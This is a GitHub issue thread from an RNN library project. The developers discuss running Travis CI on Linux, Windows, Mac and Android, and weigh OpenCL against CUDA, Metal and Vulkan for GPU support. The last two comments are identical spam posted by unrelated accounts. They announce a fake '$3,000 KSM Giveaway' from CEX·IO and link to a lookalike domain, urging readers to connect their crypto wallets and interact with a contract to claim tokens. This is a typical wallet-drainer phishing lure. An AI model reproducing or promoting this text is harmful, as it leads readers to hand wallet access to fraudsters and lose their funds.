### ISSUE TITLE
Multi-OS Travis

### ISSUE THREAD

**Issue by desmonty** [desmonty/rnnlib#20]
We need to make sure travis run the unittests on linux+mac+windows

**Comment by VHRanger** [comment]
Not sure if MacOS is necessary since they're deprecating openCL and we'll be using that for GPU.

But linux + windows (and potentially android) would be interesting

**Comment by desmonty** [comment]
Oh I didn't know that.
Well as our system might lost a lot of its interest without GPU I guess we won't have to bother for MacOS indeed.

Good point for android, I have a few ideas to use the system on android, that would be really nice.
And if we have something lightweight that use all the GPUs of high-end smartphone, we could actually be able to do some interessting stuf on mobile, that would be very nice.

**Comment by VHRanger** [comment]
Yeah, it's annoying because if you want a GPU kernel to the code, you have openCL (which works everywhere except apple), CUDA (which works only on nvidia GPU), metal (which works only on apple) or Vulkan (which was built for gaming, but seemingly can be used for compute and should target most GPUS but is not finished).

So for now openCL targetting linux, windows and probably android (which is on linux kernel anyway) seems good.

**Comment by desmonty** [comment]
Oh god I didn't know it was so complicated !
OpenCL seems perfect, fuck apple anyway.
Everything should work on linux our user will be more likely to use windows/android so openCL is good for me too.

**Comment by desmonty** [comment]
Maybe we can close this issue ?
Android continuous integration require an APK application to make sense I think.

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by pradip-ee** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)
